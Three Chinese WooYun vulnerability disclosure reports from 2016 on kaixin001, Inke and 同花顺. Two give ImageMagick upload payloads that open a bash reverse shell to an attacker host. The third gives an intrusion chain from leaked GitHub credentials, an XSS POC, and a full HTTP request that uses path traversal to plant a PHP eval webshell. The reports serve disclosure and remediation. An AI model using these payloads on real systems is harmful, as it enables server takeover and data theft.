漏洞详情披露状态： 2016-05-31： 细节已通知厂商并且等待厂商处理中2016-05-31： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-06-12： 厂商已经主动忽略漏洞，细节向公众公开简要描述：RT详细说明：今天的漏洞code 区域http://www.kaixin001.com/set/logo.php修改头像处。可以通过以下payload像之前一样反弹shellcode 区域push graphic-context viewbox 0 0 640 480 image copy 200,200 100,100 "|bash -i >& /dev/tcp/【ip】/2333 0>&1" pop graphic-context、上传正常图片的时候抓包，把上面这个payload直接添加上去就可以了直接反弹shell漏洞证明： code 区域http://www.kaixin001.com/photo/upload.php http://www.kaixin001.com/lifetime/perfect.php上传图片处用以下payloadcode 区域push graphic-context viewbox 0 0 640 480 image copy 200,200 100,100 "|bash -i >& /dev/tcp/【ip】/2333 0>&1" pop graphic-context上传一个正常的照片，然后抓包添加payload，上传反弹shell都是源码 修复方案：改改改版权声明：转载请注明来源 千机@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-06-12 14:00厂商回复： 漏洞Rank：15 (WooYun评价)最新状态：暂无

漏洞详情披露状态： 2016-05-07： 细节已通知厂商并且等待厂商处理中2016-05-08： 厂商已经确认，细节仅向厂商公开2016-05-18： 细节向核心白帽子及相关领域专家公开2016-05-28： 细节向普通白帽子公开2016-06-07： 细节向实习白帽子公开2016-06-22： 细节向公众公开简要描述： 详细说明：app头像上传处传一张图抓包把图片的内容改为push graphic-contextviewbox 0 0 640 480fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/外网服务器ip/12340 0>&1")'pop graphic-context服务器监听12340端口没监听一次就会有一个不同的ip漏洞证明：app头像上传处传一张图抓包把图片的内容改为push graphic-contextviewbox 0 0 640 480fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/外网服务器ip/12340 0>&1")'pop graphic-context服务器监听12340端口 没监听一次就会有一个不同的ip修复方案： 版权声明：转载请注明来源 头晕脑壳疼@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：15确认时间：2016-05-08 21:48厂商回复：感谢关注映客安全。这个漏洞我们之前已经了解并且处理。在处理过程中小伙子就在各种反弹shell，我们处理了反弹连接后还不死心继续弹数十次。小伙子想干啥？大半夜的让不让人睡觉了？抓到打死，不死也要残废。最新状态：暂无

漏洞详情披露状态： 2016-04-25： 细节已通知厂商并且等待厂商处理中2016-04-25： 厂商已经确认，细节仅向厂商公开2016-05-05： 细节向核心白帽子及相关领域专家公开2016-05-15： 细节向普通白帽子公开2016-05-25： 细节向实习白帽子公开2016-06-09： 细节向公众公开简要描述：大牛们开刷同花顺SQL注入，看到股票又跌了，伐开森。同花顺安全加强详细说明：不做标题党，牛的洞有的是。漏洞还是很严重的结果：公司2000多内部员工信息泄露（含邮箱），内部3万多文档泄露，少量密码泄露，get一机器administrator权限希望乌云大大重视这个漏洞，不造能不能加精，加吧~~。漏洞修复前还是不要小范围公开了，涉及证券的，还是比较敏感。首先是github信息泄露https://github.com/www1350/firstob/blob/cb501378df1718f54df7dbefc1c4ca577c334cbe/src/main/resources/conf/mail.properties然后找code 区域https://mail.myhexin.com/src/webmail.php登陆了然后看邮件获得地址code 区域https://218.108.90.228:10089/hexin-crm虽说是动态密码，但是是发送给邮箱的。获得后进入系统3万多文档（包含项目开发文档，里头应该有密码文件，敏感文件）500多个项目员工姓名也可获得，开发请看返回的json里面有邮箱名进一步深入获得服务器rdp文件，可远程连接之前的一次安全漏洞测试也泄露了，这里头肯定有其他漏洞，不深入了漏洞证明：文档虽然不能点击下载，但是部分附件是可以下载的，用的接口一样，改一个id就可以同样下载了这个接口获得Idcode 区域https://218.108.90.228:10089/hexin-crm/document/document.do?method=queryDoucuments这个接口下载code 区域https://218.108.90.228:10089/hexin-crm/task/task.do?method=downloadById&task_annex_id=40205上传文件处可任意上传文件，但是访问时都当做下载文件处理了，没能执行上传上的文件文件名可改,一处存储XSS,这个很严重的，你们cookie都不保了。。。code 区域POC:"><script>alert(1)</script>总结一下：虽说是密码泄露引起的一系列漏洞，但是突破第一层防线后，后面也不能泄露过多敏感信息的，这里包含了安全管理的问题。漏洞危害：1、员工账号泄露2、公司内部包含密码的文档泄露3、远程连接的配置文件和密码泄露，导致服务器被入侵4、存储型XSS，可批量获得员工cookie，伪造登陆5、文件上传处未校验文件类型，有植入webshell的风险，获得服务器权限6、文件上传可更改id，应该可覆盖之前的文档（可导致文档被莫名删除，我没看到有删除文档的功能）下面task_id更改应该就能覆盖了，没尝试remark参数有XSS漏洞，在输入和输出时都做转义。code 区域POST https://218.108.90.228:10089/hexin-crm/task/task.do?method=uploadTaskAnnex HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: https://218.108.90.228:10089/hexin-crm/index.html Accept-Language: zh-CN User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Content-Type: multipart/form-data; boundary=---------------------------7e05f18e107e Accept-Encoding: gzip, deflate Host: 218.108.90.228:10089 Content-Length: 1151 DNT: 1 Connection: Keep-Alive Cache-Control: no-cache Cookie: JSESSIONID=AB10B437D56DDD5F2EB09C9C6174C6FC -----------------------------7e05f18e107e Content-Disposition: form-data; name="annexFile"; filename="../../../../../../../../../../../../../data/tomcat-crm/webapps/hexin-file//1.php" Content-Type: text/plain <?php @eval($_POST['c']);?> -----------------------------7e05f18e107e Content-Disposition: form-data; name="annexFile"; filename="" Content-Type: application/octet-stream -----------------------------7e05f18e107e Content-Disposition: form-data; name="docu_type" -1 -----------------------------7e05f18e107e Content-Disposition: form-data; name="docu_type" -1 -----------------------------7e05f18e107e Content-Disposition: form-data; name="task_step_id" 140358 -----------------------------7e05f18e107e Content-Disposition: form-data; name="remark" "><script>alert(2)</script> -----------------------------7e05f18e107e Content-Disposition: form-data; name="task_id" 37443 -----------------------------7e05f18e107e Content-Disposition: form-data; name="islock" -----------------------------7e05f18e107e Content-Disposition: form-data; name="islock" -----------------------------7e05f18e107e--修复方案：修复建议：1、加强管理，禁止将员工账号放到github上2、管理系统动态密码应该和手机绑定，绑定到邮箱是没用的，邮箱泄露了，动态密码发到邮箱有个啥用。。。3、如果有可能，搞一个VPN，别让外网访问这个CRM系统了4、这个管理系统做的还不太完善，员工应该有不同的权限访问不同的文档5、上传附件的接口，后端对文档类型做校验，列白名单处理，只允许上传excel doc ppt rar jpg这种文件吧6、存储型XSS过滤 转义特殊字符。7、敏感文件不要放到这种公共的地方，尤其是rdp文件，这个请管理员到文档里搜索吧。8、管理员排查一下敏感文件。有问题可以QQ我的。另外。。。。。。。。。。能不能给个level2或者手机短线宝，尾盘捡钱包什么的。嘿嘿^_^，脸皮厚版权声明：转载请注明来源 Fencing@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：15确认时间：2016-04-25 15:10厂商回复：你好，漏洞已确认，正在进行修复，谢谢。最新状态：暂无